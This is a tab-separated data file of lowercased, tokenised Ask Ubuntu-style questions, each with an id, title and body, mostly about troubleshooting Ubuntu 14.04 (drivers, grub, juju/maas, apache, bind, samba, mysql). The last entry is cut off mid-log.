469746	touchpad not detected	i am using ubuntu 14.04 in the new lenovo z510 ideapad laptop . to check if my touchpad is detected i typed the command xinput list and this is my output : i tried everything mentioned in this , this and this . i have made touchpad-enabled to true . but still the same problem persists . and this is how my mouse & touch pad setting looks like : help .
469747	question about qgis server installation on ubuntu 14.04	i am using ubuntu 14.04 on a virtual box with win 7 ( 64 bit ) being the host & i 'm a newbie to linux environment . i am installing qgis server on ubuntu following this tutorial in which i was able to add successfully to `` /etc/apt/sources.list '' in next step we need to add key and update the package list which i 'm unable to find a key for ubuntu and qgis server . tried searching on google and confused as to where should i obtain the key from ? in qgis server official version they have provided key but its not working for ubuntu 14.04 lts any help regarding this will be great !
469748	what is the meaning of $ $ 1 in bash ?	i am actually playing with arguments and its happened . i just thought like to see what will happen if i type $ $ 1 and i did it and got something below . raja @ raja-bonefish : ~ $ $ $ 1 19301 : command not found what 's that 19301 mean , is it telling something ? bottom-line : what does meaning for $ $ 1 in bash .
469753	files transfered from windows have owner `` nobody '' . no file can be openned through ethernet by windows	after installing ubuntu 14.04 there is a problem with my local network . in ubuntu i can copy or open any windows file from another pc by ethernet . from windows i can only copy files in both directions . all files copied to ubuntu common folder obtain owner `` nobody '' . any file on ubuntu machine can not be edited with libreoffice in windows machine . what 's wrong ? with best regards . viktor .
469755	how can i improve the quality of sound in ubuntu ?	i just installed ubuntu 14.04 lts , and i 'm loving it . only thing is that i 'm having problems with my laptop 's sound quality . it sounds empty , or hollow . i 'm not exactly sure how to put it to words , but it 's noticeably worse than it was on windows 8.1 . in fact , it was very much above average on windows . i like ubuntu but this sound quality issue is really annoying me , and even giving me a headache at times . it 's not as loud as it should . if i put up the volume to 100 % , my laptop 's speakers start to resonate and distort , just sounds terrible overall . background info : i have an hp envy ts-15 /w altec lansing , in windows it had beats audio drivers.it has 2 front speakers , 2 subwoofers , and one speaker on the bottom of the laptop .
469760	problem with xrandr	after i change an external display resolution with xrandr to 1920 1080 the following error appears failed to apply configuration : % s gdbus.error : org.gtk.gdbus.unmappedgerror.quark._gnome_2drr_2derror_2dquark.code2 : could not set the configuration for crtc 98
469766	ubuntu 14 installation wo n't recognize one of my hard drives	so basically i used to have a working machine with ubuntu and windows 7 on a single hard drive . suddenly , my machine fried , so i got a new rig . now , i installed windows 7 on a new sdd drive , and i want to re install ubuntu on my old drive . i reformatted the old drive and now for some reason , the ubuntu installation is n't recognizing it , even though the drive appears fine on windows 7 . i 'm attaching some `` screen ( phone ) shots '' so you can see , notice how the 3rd drive ( drive g ) in windows 7 is n't appearing in the installation . any thoughts ? windows 7 screen , ubuntu 14 installation screen sorry for the bad quality , i took them with my phone out of laziness
469767	apache not including site config	i have added a config file to my /etc/apache2/sites-available and added a link to /etc/apache2/sites-enabled . yet if i restart my server and check with apache2ctl -s , i only get the virtualhost from 000-default . root @ ns00001 : /etc/apache2/sites-available # apache2ctl -s virtualhost configuration : *:80 ns00001.ip-x.x.x.x.com ( /etc/apache2/sites-enabled/000-default.conf:1 ) serverroot : `` /etc/apache2 '' main documentroot : `` /var/www '' main errorlog : `` /var/log/apache2/error.log '' mutex mpm-accept : using_defaults mutex watchdog-callback : using_defaults mutex default : dir= '' /var/lock/apache2 '' mechanism=fcntl pidfile : `` /var/run/apache2/apache2.pid '' define : dump_vhosts define : dump_run_cfg user : name= '' www-data '' id=33 group : name= '' www-data '' id=33 the file i have created in /etc/apache2/sites-available is mydomain.eu and contains the following text : virtualhost *:80 > servername test.mydomain.eu documentroot /var/www/test < directory /var/www/test/ > options indexes followsymlinks multiviews allowoverride authconfig order allow , deny allow from all < /directory > < /virtualhost > but when i go to test.mydomain.eu i get the apache default page ( it works ! ) . so this means the 000-default takes over . yes , i have restarted the apache2 service after changing the config . can someone help me with this , what am i forgetting ?
469768	problem with canon mx370 scanner	update : fixed by manually updating sane from 1.0.23 to 1.0.25 , which includes full support for the scanner , unlike 1.0.23 . i have a problem with a canon mx370 scanner . when i do sudo sane-find-scanners : # sane-find-scanner will now attempt to detect your scanner . if the # result is different from what you expected , first make sure your # scanner is powered up and properly connected to your computer . # no scsi scanners found . if you expected something different , make sure that # you have loaded a kernel scsi driver for your scsi adapter . could not fetch string descriptor : pipe error could not fetch string descriptor : pipe error could not fetch string descriptor : pipe error could not fetch string descriptor : pipe error could not fetch string descriptor : pipe error could not fetch string descriptor : pipe error # no usb scanners found . if you expected something different , make sure that # you have loaded a kernel driver for your usb host controller and have setup # the usb system correctly . see man sane-usb for details . # not checking for parallel port scanners . # most scanners connected to the parallel port or other proprietary ports # ca n't be detected by this program . but it does recognize it when i do scanimage -l device `pixma:04a91759 ' is a canon canon pixma mx370 series multi-function peripheral also , vuescan works fine with it , but i do n't want to buy the software before trying to fix simple scan or xscan . the scanner shows as supported at the sane website . does anyone have any idea on what 's going on ? thanks in advance .
469771	unity wont work in ubuntu 14.04 virtualbox	when i try to boot up unity 14.04 lts on virtual box after installation , it says , `` sorry , ubuntu 14.04 has experienced an internal error . '' under the details , it says that the executable path is : usr/bin/compiz the package is : compiz-core 1:0.9.11+14.04.20140409-0ubuntu1 and the problem type is crash . this leads me to think that this is the reason for the problem i 'm experiencing because after i send the error report and ubuntu loads up , the side and top bars dont show up . it is just the background . i can right click , and i can use the ctrl+alt+f1 menu to bring up ccsm and the terminal if there is any commands that may fix this problem .
469774	go back to the last command	suppose you type a command in terminal after enter you will see a list which more than one page . now you want to read the result from the beginning and you should scroll up . so if you put some commands before your last one its a bit difficult to scroll the the last one -- at least for me -- so i need any key switch which show the screen from the last command . ps : i want to screen show the last command by key switch . is there any key switch like ctrl+ l which clear the screen . less command show the screen page by page .
469776	citrix receiver for 14.04 lts	i am trying install icaclient-modified.deb and getting error . workstation @ home : ~/downloads $ dpkg -b ica_temp icaclient-modified.deb dpkg-deb : building package `icaclient ' in `icaclient-modified.deb ' . workstation @ home : ~/downloads $ sudo dpkg -i icaclient-modified.deb ( reading database ... 238986 files and directories currently installed . ) preparing to unpack icaclient-modified.deb ... segmentation fault ( core dumped ) unpacking icaclient ( 12.1.0 ) over ( 12.1.0 ) ... setting up icaclient ( 12.1.0 ) ... dpkg : error processing package icaclient ( -- install ) : subprocess installed post-installation script returned error exit status 2 processing triggers for menu ( 2.1.46ubuntu1 ) ... errors were encountered while processing : icaclient workstation @ home : ~/downloads $
469778	juju bootstraping gomaasapi timestamp error	have a simple setup consisting of one lts 14.04 maas server , responsible for dhcp and dns , and a laptop target node . target node has successfully reached `` ready '' state ; however , while attempting to bootstrap into maas environment , i get the following error : error juju.cmd supercommand.go:305 gomaasapi : got error back from server : 401 ok ( expired timestamp : given 1400585768 and now 1400610974 has a greater difference than threshold 300 ) this happens towards the end of bootstrap process , i.e . target node has been update and relevant service have started it : juju -v -- debug bootstrap -e maas -- upload-tools ... setting up libsnappy1 ( 1.1.0-1ubuntu1 ) ... setting up juju-mongodb ( 2.4.9-0ubuntu3 ) ... processing triggers for libc-bin ( 2.19-0ubuntu6 ) ... tools from http : //maas_ip.hum.com/maas/api/1.0/files/ ? key=a5b32a4c-e04c-11e3-8e9d-3c970e523f90 & op=get_by_key downloaded : http 200 ; time 0.229s ; size 7356324 bytes ; speed 32134911.000 bytes/s 559550d004af5b4c7cee626c6be1b9fae2d2fcac15ce66fb41443eb0a0c8b3df /var/lib/juju/tools/1.18.3.1-trusty-amd64/tools.tar.gz tar : force-version : time stamp 2014-05-20 18:29:11 is 24782.564204358 s in the future tar : jujud : time stamp 2014-05-20 18:29:11 is 24782.252135833 s in the future 1+0 records in 1+0 records out 1048576 bytes ( 1.0 mb ) copied , 0.00266961 s , 393 mb/s 1+0 records in 1+0 records out 1048576 bytes ( 1.0 mb ) copied , 0.00269804 s , 389 mb/s 1+0 records in 1+0 records out 1048576 bytes ( 1.0 mb ) copied , 0.00339052 s , 309 mb/s juju-db start/running , process 31297 2014-05-20 11:36:08 info juju.cmd supercommand.go:302 running juju-1.18.3.1-trusty-amd64 [ gc ] 2014-05-20 11:36:08 debug juju.agent agent.go:384 read agent config , format `` 1.18 '' 2014-05-20 11:36:08 debug juju.provider.maas environprovider.go:30 opening environment `` maas '' . 2014-05-20 11:36:08 error juju.cmd supercommand.go:305 gomaasapi : got error back from server : 401 ok ( expired timestamp : given 1400585768 and now 1400610974 has a greater difference than threshold 300 ) 2014-05-20 18:36:14 error juju.provider.common bootstrap.go:123 bootstrap failed : rc : 1 stopping instance ... 2014-05-20 18:36:14 info juju.cmd cmd.go:113 bootstrap failed , destroying environment 2014-05-20 18:36:14 info juju.provider.common destroy.go:14 destroying environment `` maas '' 2014-05-20 18:36:15 error juju.cmd supercommand.go:305 rc : 1 been searching for timestamp keyword with no luck . rebooting and recommissioning of the target node does n't seem to help . any help would be appreciated . cheers
469780	auto-mount usb drive on chromebook to use with dropbox	i have replaced chrome os on my acer c720 with ubuntu 14.04 , so far i 'm quite happy besides the limited local storage capasity . to remedy this i have bought a 32 gb usb drive ( sandisk cruzer fit ) and are planning to use this as an extension to the internal harddrive , preferably auto-mounted on startup with a fixed path so that i can put use it for dropbox . but i do not want to compromise security , so i would need the usb drive to be encrypted like my home folder . is it possible to auto-mount the usb drive with a fixed path so i can have a constant dropbox setup on it ( i sadly need a local copy of my dropbox ) ? is it possible to do something smart security wise so that i do n't compromise my data on the usb drive if my laptop get stolen . i know there is possible to upgrade the internal ssd and that this would solve all my problems , but it 's to expensive for the moment and i would really like to put the usb drive into some good use if possible . thanks in advanced for feedback on this post .
469781	grub rescue error : out of disk space	i 'm pretty new in linux , i used the list command to get : ( hd0 ) ( hd0 , msdos5 ) ( hd0msdos1 ) i ca n't search , i really just do n't know what to do ? i read i would be able to fix the problem if i booted ubuntu , but i do n't have a live disk , and i do n't know how to in grub rescue . i 've tried to look through command lists and find what might be usedfull , like i looked through : https : //help.ubuntu.com/community/grub2/troubleshooting , and error out of disk , grub rescue this error just suddenly started after i let someone used my computer to check their banking or something , and they shut it off . when i turned it back on i was directed to grub rescue . any advice ?
469782	a black screen is appearing once i enter my password	i am using ubuntu 12.10 . it was working properly . but now if i enter the password , a black screen is coming , i cant do anything . but i can enter as guest user . please help me to solve this problem .
469783	ubuntu 14.04 : ca n't connect to new password protected wifi network	after upgrading to ubuntu 14.04 i ca n't connect to any new wpa2 wifi access points . existing ones work . here is a pastebin of the syslog output : http : //pastebin.com/qvgmrmxp here is an error that sometimes shows in a pop-up : ( nm-applet:28277 ) : nm-applet-warning ** : connection activation failed : ( 1 ) creating object for path '/org/freedesktop/networkmanager/activeconnection/34 ' failed in libnm-glib . there is a workaround , but it ai n't pretty . when failing to connect , a file will be created here : /etc/networkmanager/system-connections/ < name of network > if i edit that file and add a password psk=password to the [ 802-11-wireless-security ] section , then i can connect . more info : http : //pastebin.com/slrq2s6m
469786	chromium not seeing pepperflashplugin-nonfree	i 've just upgraded to xubuntu 14.04 . i installed chroimum ( chromium-browser package , not google chrome ) . then installed by running : sudo apt-get install pepperflashplugin-nonfree sudo update-pepperflashplugin-nonfree -- install however if i try to load a flash element it still says it is n't installed and it does n't appear under the chrome : //plugins page either . running sudo update-pepperflashplugin-nonfree -- status returns this : flash player version installed on this system : 13.0.0.214 flash player version available on upstream site : 12.0.0.77
469790	how to count the result	how to count the result ? when you write a command and some result appears . any way to count them . for example if i want how many result i have for applications which have python word . dpkg -l | grep python
469791	14.04 thinkpad edge volume buttons stopped working	the media buttons for increasing/decreasing the volume of audio output and the mute-button stopped working out of nowhere . the buttons are still recognized by the system , as i can select them to perform the desired action in the gnome control centre , but pressing on of these buttons will do nothing . all the other buttons of the fn-row are working properly . xev says on button-press : keypress event , serial 37 , synthetic no , window 0x4600001 , root 0x9d , subw 0x0 , time 190010 , ( 19 , -11 ) , root : ( 1244,41 ) , state 0x0 , keycode 122 ( keysym 0x1008ff11 , xf86audiolowervolume ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false keyrelease event , serial 37 , synthetic no , window 0x4600001 , root 0x9d , subw 0x0 , time 190104 , ( 19 , -11 ) , root : ( 1244,41 ) , state 0x0 , keycode 122 ( keysym 0x1008ff11 , xf86audiolowervolume ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false keypress event , serial 37 , synthetic no , window 0x4600001 , root 0x9d , subw 0x0 , time 191040 , ( 19 , -11 ) , root : ( 1244,41 ) , state 0x0 , keycode 123 ( keysym 0x1008ff13 , xf86audioraisevolume ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false keyrelease event , serial 37 , synthetic no , window 0x4600001 , root 0x9d , subw 0x0 , time 191118 , ( 19 , -11 ) , root : ( 1244,41 ) , state 0x0 , keycode 123 ( keysym 0x1008ff13 , xf86audioraisevolume ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false what can i do to get them working again ? edit : ok , so i tried to create a shortcut for `` volume up '' , using the command pactl set-sink-volume 0 +10 % . binding it to strg++ worked , but binding it to the `` volume up '' -button has no effect .
469796	nautilus not restoring opened windows but opens a new one	i 'm on 14.04 this only happens if the opened windows is showing the content of an ntfs partition - very annoying because my music and video folders are just symlinks to a common ( win/ubuntu ) storage hdd .
469798	mysql wont start with xampp	i have installed xampp on my ubuntu 14.04 and everything works but not mysql . mysql is installed and works just fine with workbench but not when i try to reach it with a installation of magento . strange thing is that with xampp app it shows mysql as stopped but i can reach it with workbench . i have tried to restart mysql both through terminal and xampp app but that did not work . i know my mysql user name and password so that can not be the issue . what can i do to fix this ?
469801	error importing numpy into python	hello i know there are a lot of posts already about this but after reading through previous posts i still have not found a solution to my issue . to install python i followed the steps of this post here . all seemed to work as expected . in terminal , typing python gives : zachary @ zachary-desktop : ~ $ python python 2.7.5 ( default , may 20 2014 , 12:26:28 ) [ gcc 4.8.2 ] on linux2 type `` help '' , `` copyright '' , `` credits '' or `` license '' for more information . to install numpy i followed the instructions outlined here following the steps i reached this point zachary @ zachary-desktop : ~ $ python -- version python 2.7.5 zachary @ zachary-desktop : ~ $ apt-cache policy python-numpy python-numpy : installed : 1:1.8.1-1ubuntu1 candidate : 1:1.8.1-1ubuntu1 version table : *** 1:1.8.1-1ubuntu1 0 500 http : //us.archive.ubuntu.com/ubuntu/ trusty/main amd64 packages 100 /var/lib/dpkg/status zachary @ zachary-desktop : ~ $ apt-cache policy cython cython : installed : 0.20.1+git90-g0e6e38e-1ubuntu2 candidate : 0.20.1+git90-g0e6e38e-1ubuntu2 version table : *** 0.20.1+git90-g0e6e38e-1ubuntu2 0 500 http : //us.archive.ubuntu.com/ubuntu/ trusty/main amd64 packages 100 /var/lib/dpkg/status zachary @ zachary-desktop : ~ $ zachary @ zachary-desktop : ~ $ apt-cache policy python-scipy python-scipy : installed : 0.13.3-1build1 candidate : 0.13.3-1build1 version table : *** 0.13.3-1build1 0 500 http : //us.archive.ubuntu.com/ubuntu/ trusty/universe amd64 packages 100 /var/lib/dpkg/status so as far as i can see i have installed all of the modules correctly . however when i try to import i get the following error zachary @ zachary-desktop : ~ $ python python 2.7.5 ( default , may 20 2014 , 12:26:28 ) [ gcc 4.8.2 ] on linux2 type `` help '' , `` copyright '' , `` credits '' or `` license '' for more information . > > > import numpy traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > importerror : no module named numpy i think an error may be with the path however i am new to ubuntu and do n't know how to change this setting . when i do zachary @ zachary-desktop : ~ $ echo $ pythonpath i get a blank line , which seems wrong . thanks for the help !
469804	ubuntu 14.04 no sound	i can hear no sound from my laptop . i installed ubuntu 14.04 2 days ago and at first everything worked fine , but after a reboot the sound stopped . i searched for 3 hours on google and tried everything i found , but nothing helped . edit : i already tried the solution from the posted thread and it did n't help . edit2 : the sound does work on headphones . but it does n't work on speakers . it 's not a hardware problem . alsainfo : http : //www.alsa-project.org/db/ ? f=5b7f589a8cd035feb28d0a87bd1c79a304c5ad29
469807	how do i install tuxlol on ubuntu 14.04 lts ?	i installed league of legends on ubuntu 14.04 lts . it installed , but when i click the launcher , i get an immediate bug splat . i 'm following instructions how to fix this problem but this one came up and i have no idea how to install it ( i 'm brand new to linux ) : install tuxlol download it from here : https : //bitbucket.org/xargoth/tuxlol/wiki/home unzip anywhere you want enter the folder you just unzipped ( where there is the tuxlol.exe file ) and execute it : $ mono tuxlol.exe patch -- dir `` league_of_legends_dir '' obviously , replace league_of_legends_dir with your league of legends directory . in my case , it 's installed here : ~/.playonlinux/wineprefix/leagueoflegends/drive_c/riot games/league of legends/ ps : you 'll have to reaply this patch everytime a new lol update is released . source article shop and in game item shop not working in league of legend ( lol )
469810	juju maas bootstrap all on vm	1 ) i have maas server on vm with 4 node all ubuntu 14.04 trusty 2 ) i have another vm as juju server i tried to bootstrap juju i got this error : error bootstrap failed : can not upload bootstrap tools : juju can not bootstrap because no tools are available for your environment . you may want to use the 'tools-metadata-url ' configuration setting to specify the tools location . any suggestion ?
469815	connect to open vpn server using tls certificates	i have installed openvpn and network-manager-openvpn-gnome because i need to connect to an open vpn server . this is the config file i was given : client dev tun proto udp remote xxx.xxx.xxx.xxx 1194 resolv-retry infinite nobind persist-key persist-tun ca ca.crt cert svpn-client-5.crt key svpn-client-5.key dh dh1024.pem ns-cert-type server tls-auth ta.key 1 comp-lzo verb 3 this configuration is working because i can connect from windows . i 've created ( using the gui ) a new vpn connection : gateway : xxx.xxx.xxx.xxx authentication : certificates ( tls ) user certificate : svpn-client5.crt ca certificate : ca.crt private key : svpn-client5.key private key password : ****** advanced : general : use lzo compression ( checked ) tls authentication : use additional tls authentication ( checked ) key file : ta.key key direction : 1 when i save and click on `` connect '' , i get a time out . is it possible to connect using this parameters from the gui as i 'm trying to ?
469817	ubuntu 14.04 draining battery very quickly	i know there are several other questions very similar to this , but i feel that questions like this are specific to the system you are running and so there is not really a `` one size fits all '' type of fix . im still very new to ubuntu and so am still figuring things out . when i first installed ubuntu it had some freezing issues but after asking a question and downloading the nvidia driver i have n't had a problem since with freezing . now however my battery seems to been draining at a very quick pace ( a percent about every minute and a half ) . i do n't remember having this problem when i first installed ubuntu , it seemed to run for a good while before draining the battery . my assumption ( with some research added on ) is that after installing the nvidia driver it is using my high powered video card constantly , instead of only when needed ( i 'm using a dell precsion laptop that has integrated video and a dedicated one ) . this would explain the very quick loss of battery . however i 'm not quite sure what to do about it . i heard of a program called bumblebee that might solve my problems but i 'm not save enough to know whether it will or not at this point . any input or thoughts would be appreciated , i would really like to get this solved ! `` edit '' : i have tried bumblebee and that totally screwed up the graphics so i did a fresh install of ubuntu and am back to where i started now . i will try tlp as a guy below suggest and see what happens . i would also like to mention that the computer battery seemed to be about average until i re-installed the nvidia driver , which seemingly begain to reduce my battery life again . i believe this gives even more evidence towards my first hypothesis about the nvidia driver .
469818	how do i execute a .exe file from a certain directory in another directory ?	i 'm trying execute tuxlol.exe . i tried ./tuxlol but i keep getting error messages saying no such command exists . the code i 'm trying to execute in terminal is : $ mono tuxlol.exe patch -- dir `` league_of_legends_dir '' here 's the website where i 'm getting information from . shop and in game item shop not working in league of legend ( lol )
469819	install dwarf fortress ?	i 'm trying to install dwarf fortress , and you have to unpack the file in a certain way . here are the instructions they give : unpacking : dwarf fortress is shipped as a ( bzip2 ) compressed tar archive . it will extract into a new directory called df_linux . so , cd to wherever you want the game to be unpacked , and then run tar xjf /path/to/df_xx_yy_linux.tar.bz2 ( where df_xx_yy_linux.tar.bz2 is the filename ) . then run cd df_linux to change into the new directory . i cd 'd to desktop , where i wanted to unpack the file . however , when i entered tar xjf /path/to/df_xx_yy_linux.tar.bz2 , this was the result : pickle @ pickle-nc10 : ~/desktop $ tar xjf /path/to/df_34_11_linux.tar.bz2 tar ( child ) : /path/to/df_34_11_linux.tar.bz2 : can not open : no such file or directory tar ( child ) : error is not recoverable : exiting now tar : child returned status 2 tar : error is not recoverable : exiting now i already am on a 32-bit system , but i still tried to use sudo apt-get install ia32-libs libsdl-image1.2 libsdl-sound1.2 libsdl-ttf2.0-0 to see if it would change anything . as i expected , no change . the filename is correct , i double checked . i 'm not experienced with using the terminal , so is there something i 'm missing ? any help will be greatly appreciated . by the way , if you want a link straight to the installation page for dwarf fortress , here you go . update : i tried using pickle @ pickle-nc10 : ~/desktop $ tar xjf /path/to/home/pickle/downloads/df_34_11_linux.tar.bz2 same result as before . this is me using the complete file name , same response as before .
469820	how to add a partition to grub ?	i had windows previously installed and installed ubuntu at a separate partition . the problem is that it was not recognizing windows at that time and now ( as expected ) the computer goes directly to ubuntu without showing boot options . i still have the ntfs partition with windows ( ubuntu can even mount it ) is there any way to tell grub that there is an os in there and show dual boot options ?
469823	ubuntu affects windows headphone	i am dual booting windows 8.1 and ubuntu 14.04 i went to listen to my headphones in windows and could hear nothing . i could hear through the speakers fine . i plugged the headphones in , windows detected the headphones had been plugged in , but there was no sound . i looked on a different forum where someone said they muted the sound in linux and the headphones worked in windows . i tried it , and i have the same thing . why would this be and is there a way to stop ubuntu from influencing my headphones in windows ?
469830	casper-rw from persistent ubuntu - also using by another iso on multiboot-usb ?	i have a multiboot usb ( using grub4dos ) with a persistent ubuntu . can i use the casper-rw from the persistent ubuntu also with another iso , thus having two persistent systems 'sharing ' the same casper-rw ? mz5
469834	grub options are not visible on booting on samsung ativ book 9 lite running ubuntu 14.04	i 've managed to install ubuntu 14.04 on my new samsung ativ book 9 lite ultrabook . after updating some configuratiosn in the uefi installation was very easy . the only questions and issue i believe i 'm still experience is when booting . i believe when the laptop would be displaying the grub boot options i see the following . there is a black screen with a purple border of 10px around the screen . i 'd like to know how i can update my system so that i see the grub boot manager . i 've run these commands : sudo cat /etc/default/grub # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' the command was not possible , sudo efibootmgr .
469837	most secure way to install node ?	should i install node as root and then add user permissions to run it , or add a sudo user to the sudoers file and install and run it that way ? it seems to me that adding the user to sudo would be a vulnerability .
469845	how to play video downloaded from terminal	i have downloaded a youtube video using the terminal but now i do n't know how to play it . i have checked the download folder but i did n't find anything . so , how can i play this file ?
469846	ubuntu terminal and system monitor close unexpectedly	when i execute certain commands on the terminal , even typing just `` find '' , the terminal closes instantly . i also ca n't open system monitor without it closing ( but the window does flash for a second ) . this is a brand new install of 14.04
469847	error 1064 ( 42000 ) creating table mysql	i try to build my own website , and at my website i ask people to enter their name and write a little story . when they are done , they hit submit , and it sends the information to my database . i work with mysql , and i want to create a table where i can store the information in . this is my mysql code : + create table names ( name primary key not null , message not null , ipv4 not null , browser not null , date not null , time not null , ) ; but when i enter this in my command prompt , it says : error 1064 ( 42000 ) : you have an error in your sql syntax ; check the manual that corresponds to your mysql server version for the right syntax to use near 'primary key not null , message not null , ipv4 not null , browser not null , date no ' at line 1can you tell me what i did wrong and how to fix this ? i do n't know if it 's helpful , but i 've encluded my php script too . it can be a little messy with names because i had to translate the variables to english . my php code is ( i created it before i created the table , and as you see i did manage to set up my database 'names ' , also i want to call my table 'names ' ) : $ name = $ _post [ 'name ' ] ; $ message = $ _post [ 'message ' ] ; $ user = 'user ' ; $ password = 'login ' ; $ host = 'localhost:3036 ' ; $ browser = $ _server [ 'http_user_agent ' ] ; $ ip = $ _server [ `` remote_addr '' ] ; date_default_timezone_set ( 'utc+1 ' ) ; $ date = date ( `` y-m-d '' ) ; $ time = date ( `` h : i : s '' ) ; $ connect = mysql_connect ( $ host , $ user , $ password ) ; if ( ! $ connect ) { $ error = mysql_error ( ) ; print `` sorry , could not connect : $ error '' ; } print `` connected ! `` ; $ database = `` use names '' ; $ table = `` insert into names ( name , message , ipv4 , browser , date , time ) values ( $ name , $ message , $ ip , $ browser , $ date , $ time ) '' ; if ( ! $ database ) { $ error=mysql_error ( ) ; echo `` \ncould not find database ! error : $ mysql_error '' ; } if ( ! $ table ) { $ error=mysql_error ( ) ; echo `` \ncould not write to database ! error : $ error '' ; } $ close = mysql_close ( $ connect ) ; if ( ! $ close ) { $ error=mysql_error ( ) ; echo `` \ncould not close connection ! error : $ error '' ; } echo `` \nbedankt $ name ! `` ;
469848	ca n't deploy wordpress with juju	successfully deployed mysql on machine 0 , and forced deployment of wordpress on the same machine , i.e. , juju deploy -- to 0 -repository : /xxxx local : trusty : /wordpress . juju status shows installation failure : wordpress/0 : agent-state : error agent-state-info : 'hook failed : `` install '' ' agent-version : 1.18.3.1 machine : `` 0 '' public-address : node1.maas looking in /var/log/juju/unit-mysql-0.log , noted the following : ... 2014-05-20 20:39:42 info juju.worker.uniter modes.go:65 found queued `` install '' hook 2014-05-20 20:39:42 info juju.worker.uniter uniter.go:480 running `` install '' hook 2014-05-20 20:39:42 info install + add-apt-repository ppa : charmers/charm-helpers 2014-05-20 20:39:47 debug juju.worker.uniter.filter filter.go:317 got unit change 2014-05-20 20:43:58 info install can not add ppa : 'ppa : charmers/charm-helpers ' . 2014-05-20 20:43:58 info install please check that the ppa name or format is correct . 2014-05-20 20:43:58 error juju.worker.uniter uniter.go:486 hook failed : exit status 1 2014-05-20 20:43:58 debug juju.worker.uniter modes.go:384 modecontinue exiting ... target node is a single nic machine , connected to the local maas network , and seems that it is not able to access ppa : charmers/charm-helpers . any work around ? cheers ,
469850	how to join a windows pc to a ubuntu domain	i am running ubuntu server 14.04 . i have tried numerous samba config files with no success in having windows 7 & 8 machines join the samba domain . using the official samba 3 howto guide , page 49 , i stripped my smb.conf file to bare bones . here is my smb.conf file content . # global parameters [ global ] netbios name = frank-n-stein workgroup = tux-net # # passdb backend = tbdsam # os level = 33 # preferred master = yes # local master = yes domain master = yes security = user domain logons = yes # logon path = \\ % n\profiles\ % u when i try to join from windows , i get this message : `` the specified domain either does not exist or could not be contacted . '' however , i searched the web and discovered a windows built-in procedure which locates domain controllers on a local network . to use it : open windows terminal screen ( 2 ) change directory to users\administrator `` cd c : \users\administrator enter at the command prompt nltest /dcname : { name of domain } on my windows machines , they quickly find my domain controller , `` frank-n-stein '' . can someone help me ? the nltest utility finds the domain controller but the widows connect to a domain function ca n't seem to find it . i really need to get a basic domain in operation using ubuntu server 14.04 .
469855	chrome closing by itself and sometimes not starting at all .	sometimes it can kind of starts , but as soon as i type anything into the url bar , the window closes , no crash , no errors that i know of , it simply closes . other times it does n't even open . i really have no idea what could be going on , and i 'm sorry i ca n't provide more help , but i really want to get chrome back , and firefox makes me want to tear my hair out with the way it renders some pages and how it operates .
469858	networking- inconsistent windows shares	here 's my problem i have got a windows file server . i have the shares made and everything works on my ubuntu box . however after awhile of using the shares they stop working . the only way to restore the share i'v found is to reboot the window 7 box . is this normal or did i mess something up ?
469865	problem when switching to kdm ubuntu 14.04	successfully installed ubuntu 14.04 lts on my lenovo yoga 2 pro , was pretty happy with it , i wanted to check out kde , ( i 'm a noob and this is my first time ever trying to install a display manager ) anyways installed it through terminal , everything worked fine , and then i used sudo dpkg-reconfigure kdm , to switch my default display manager to kdm , and then i rebooted , kde desktop seemed fine at first , login screen and all , logged into my account and right i got stuck in an empty desktop ( did ctrl fn f1 and then switched back over to lightdm and now everything works as expected once again ... what did i do wrong here ?
469866	bind fatal error cant open custom log	i have been having problems with bind9 on 14.04 lts sudo service bind9 start produces next log may 20 21:47:46 c1 named [ 1110 ] : starting bind 9.9.5-3-ubuntu -u bind may 20 21:47:46 c1 named [ 1110 ] : built with ' -- prefix=/usr ' ' -- mandir=/usr/share/man ' ' -- infodir=/usr/share/info ' ' -- sysconfdir=/etc/bind ' ' -- localstatedir=/var ' ' -- enable-threads ' ' -- enable-largefile ' ' -- with-libtool ' ' -- enable-shared ' ' -- enable-static ' ' -- with-openssl=/usr ' ' -- with-gssapi=/usr ' ' -- with-gnu-ld ' ' -- with-geoip=/usr ' ' -- with-atf=no ' ' -- enable-ipv6 ' ' -- enable-rrl ' ' -- enable-filter-aaaa ' 'cflags=-fno-strict-aliasing -ddig_sigchase -o2' may 20 21:47:46 c1 named [ 1110 ] : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- may 20 21:47:46 c1 named [ 1110 ] : bind 9 is maintained by internet systems consortium , may 20 21:47:46 c1 named [ 1110 ] : inc. ( isc ) , a non-profit 501 ( c ) ( 3 ) public-benefit may 20 21:47:46 c1 named [ 1110 ] : corporation . support and training for bind 9 are may 20 21:47:46 c1 named [ 1110 ] : available at https : //www.isc.org/support may 20 21:47:46 c1 named [ 1110 ] : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- may 20 21:47:46 c1 named [ 1110 ] : adjusted limit on open files from 4096 to 1048576 may 20 21:47:46 c1 named [ 1110 ] : found 2 cpus , using 2 worker threads may 20 21:47:46 c1 named [ 1110 ] : using 2 udp listeners per interface may 20 21:47:46 c1 named [ 1110 ] : using up to 4096 sockets may 20 21:47:46 c1 named [ 1110 ] : loading configuration from '/etc/bind/named.conf' may 20 21:47:46 c1 